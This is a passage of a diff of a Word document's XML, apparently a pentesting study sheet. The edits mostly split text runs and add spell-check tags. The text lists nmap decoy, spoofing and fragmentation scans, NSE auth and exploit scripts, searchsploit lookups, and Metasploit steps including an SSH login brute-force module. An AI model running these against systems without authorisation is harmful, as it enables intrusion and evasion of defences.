               <w:t>-255</w:t>
@@ -1827,12 +2280,21 @@
                 <w:bCs/>
               </w:rPr>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>nmap -p</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -p</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1853,7 +2315,23 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t xml:space="preserve"> {ipaddress}</w:t>
+              <w:t xml:space="preserve"> {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>}</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -1902,8 +2380,29 @@
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t xml:space="preserve">Sudo nmap -f {ipaddress} </w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -f {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve">} </w:t>
             </w:r>
             <w:r>
               <w:t xml:space="preserve">– </w:t>
@@ -1924,6 +2423,7 @@
                 <w:bCs/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -1936,7 +2436,15 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t xml:space="preserve">(flood </w:t>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve">flood </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1955,17 +2463,47 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">-Sudo nmap -D </w:t>
+              <w:lastRenderedPageBreak/>
+              <w:t>-</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -D </w:t>
             </w:r>
             <w:r>
               <w:t xml:space="preserve">RND:5 </w:t>
             </w:r>
             <w:r>
-              <w:t>{ipaddress}</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> -sS</w:t>
-            </w:r>
+              <w:t>{</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sS</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p/>
           <w:p/>
@@ -1976,6 +2514,7 @@
                 <w:bCs/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -1988,7 +2527,15 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t xml:space="preserve">(flood – when scanning </w:t>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve">flood – when scanning </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2007,10 +2554,58 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">-Sudo nmap -D </w:t>
-            </w:r>
-            <w:r>
-              <w:t>{ipaddress}, D {ipaddress}, {ipaddress}, {ipaddress}</w:t>
+              <w:t>-</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -D </w:t>
+            </w:r>
+            <w:r>
+              <w:t>{</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}, D {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}, {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}, {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2057,8 +2652,29 @@
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t>Sudo nmap -S 8.8.8.8 -Pn -e</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -S 8.8.8.8 -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Pn</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -e</w:t>
             </w:r>
             <w:r>
               <w:t xml:space="preserve"> eth0</w:t>
@@ -2129,12 +2745,27 @@
           </w:p>
           <w:p/>
           <w:p>
-            <w:r>
-              <w:t xml:space="preserve">Sudo </w:t>
-            </w:r>
-            <w:r>
-              <w:t>nmap –script auth 192.168.1.75 -sS</w:t>
-            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> –script auth 192.168.1.75 -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sS</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t xml:space="preserve">   </w:t>
             </w:r>
@@ -2151,14 +2782,35 @@
           </w:p>
           <w:p/>
           <w:p>
-            <w:r>
-              <w:t xml:space="preserve">Sudo nmap –script </w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> –script </w:t>
             </w:r>
             <w:r>
               <w:t>malware</w:t>
             </w:r>
             <w:r>
-              <w:t xml:space="preserve"> 192.168.1.75 -sS   </w:t>
+              <w:t xml:space="preserve"> 192.168.1.75 -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sS</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve">   </w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2169,8 +2821,29 @@
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t xml:space="preserve">Sudo nmap –script banner 192.168.1.75 -sS   </w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> –script banner 192.168.1.75 -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sS</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve">   </w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2179,8 +2852,29 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t xml:space="preserve">Sudo nmap –script exploit 192.168.1.75 -sS   </w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> –script exploit 192.168.1.75 -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sS</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve">   </w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2205,9 +2899,19 @@
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t>Sudo nmap</w:t>
-            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t xml:space="preserve"> –script-help {name}</w:t>
             </w:r>
@@ -2218,11 +2922,32 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t>Sudo nmap –script</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> ftp-anon.nse 192.168.175</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> –script</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> ftp-</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>anon.nse</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> 192.168.175</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2258,8 +2983,16 @@
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t>Manual Vulnerability Analysis and searchploit</w:t>
-            </w:r>
+              <w:t xml:space="preserve">Manual Vulnerability Analysis and </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>searchploit</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -2281,8 +3014,37 @@
                 <w:numId w:val="5"/>
               </w:numPr>
             </w:pPr>
-            <w:r>
-              <w:t>Sudo nmap -sV {ipaddress}</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sV</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -2294,7 +3056,15 @@
               </w:numPr>
             </w:pPr>
             <w:r>
-              <w:t>Find version (vsftpd 2.3.)</w:t>
+              <w:t>Find version (</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>vsftpd</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> 2.3.)</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -2306,7 +3076,15 @@
               </w:numPr>
             </w:pPr>
             <w:r>
-              <w:t>Google it if theres already existing exploitation</w:t>
+              <w:t xml:space="preserve">Google it if </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>theres</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> already existing exploitation</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2318,8 +3096,13 @@
             <w:pPr>
               <w:ind w:firstLine="720"/>
             </w:pPr>
-            <w:r>
-              <w:t>Searchsploit {version}</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Searchsploit</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> {version}</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2511,12 +3294,21 @@
                 <w:bCs/>
               </w:rPr>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>Metaploit Framework Structure</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Metaploit</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> Framework Structure</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2547,7 +3339,23 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t>Cd /usr/share/Metasploit-framework</w:t>
+              <w:t>Cd /</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>usr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>/share/Metasploit-framework</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2596,6 +3404,7 @@
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -2603,14 +3412,23 @@
               </w:rPr>
               <w:t>msfconsole</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t xml:space="preserve"> – </w:t>
             </w:r>
             <w:r>
-              <w:t xml:space="preserve">to trigger </w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> in shell</w:t>
+              <w:t xml:space="preserve">to </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:t xml:space="preserve">trigger </w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> in</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> shell</w:t>
             </w:r>
             <w:r>
               <w:t xml:space="preserve">  </w:t>
@@ -2678,7 +3496,15 @@
               <w:t>Use exploit/</w:t>
             </w:r>
             <w:r>
-              <w:t>windows/smb/ms06_040.netapi</w:t>
+              <w:t>windows/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>smb</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>/ms06_040.netapi</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -2743,6 +3569,7 @@
           <w:p/>
           <w:p>
             <w:r>
+              <w:lastRenderedPageBreak/>
               <w:t xml:space="preserve">CL: </w:t>
             </w:r>
             <w:r>
@@ -2751,7 +3578,6 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:lastRenderedPageBreak/>
               <w:t xml:space="preserve">CL: show targets </w:t>
             </w:r>
           </w:p>
@@ -2760,12 +3586,14 @@
             <w:r>
               <w:t xml:space="preserve">CL: show </w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>paypload</w:t>
             </w:r>
             <w:r>
               <w:t>s</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:r>
@@ -2856,18 +3684,58 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>CL: sudo nmap -sV {ipaddress}</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: searchsploit {version}</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
               <w:t xml:space="preserve">CL: </w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sV</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>searchsploit</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> {version}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
             <w:r>
               <w:t>s</w:t>
             </w:r>
@@ -2875,10 +3743,18 @@
               <w:t>ear</w:t>
             </w:r>
             <w:r>
-              <w:t>ch {</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> version </w:t>
+              <w:t xml:space="preserve">ch </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:t>{</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> version</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
             </w:r>
             <w:r>
               <w:t>}</w:t>
@@ -2886,12 +3762,28 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>CL: use exploit/unix/-&gt;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: show payploads or show options</w:t>
+              <w:t>CL: use exploit/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>unix</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>/-&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: show </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>payploads</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> or show options</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -2915,17 +3807,33 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t>Netcat – allow connection to UDP and TCP</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:r>
-              <w:t>CL: nc -help</w:t>
+              <w:t>Netcat</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> – allow connection to UDP and TCP</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nc</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -help</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -2957,8 +3865,33 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t>CL: Searchsploit Linux tetnetd</w:t>
-            </w:r>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Searchsploit</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> Linux </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>tetnetd</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -2972,8 +3905,17 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t>CL: search Linux telnetd</w:t>
-            </w:r>
+              <w:t xml:space="preserve">CL: search Linux </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>telnetd</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -2987,7 +3929,23 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t>CL: telnet {ipaddress}</w:t>
+              <w:t>CL: telnet {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>}</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -3015,17 +3973,41 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>CL: searchsploit samba</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: searchs samba</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: use auxiliary/scanner/smb/</w:t>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>searchsploit</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> samba</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>searchs</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> samba</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: use auxiliary/scanner/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>smb</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>/</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -3035,12 +4017,33 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>CL: use auxiliary/scanner/smb/smb_version</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: use auxiliary/scanner/smb/{VERSION}</w:t>
+              <w:t>CL: use auxiliary/scanner/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>smb</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>smb_version</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: use auxiliary/scanner/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>smb</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>/{VERSION}</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -3106,7 +4109,15 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>CL: searchsploit Samba 3.0.20</w:t>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>searchsploit</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> Samba 3.0.20</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -3186,8 +4197,21 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>CL: use auxiliary/scanner/ssh/ssh_login</w:t>
-            </w:r>
+              <w:t>CL: use auxiliary/scanner/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ssh</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ssh_login</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:r>
@@ -3203,7 +4227,15 @@
               <w:t>PASS_FILE</w:t>
             </w:r>
             <w:r>
-              <w:t xml:space="preserve"> {filepath}</w:t>
+              <w:t xml:space="preserve"> {</w:t>
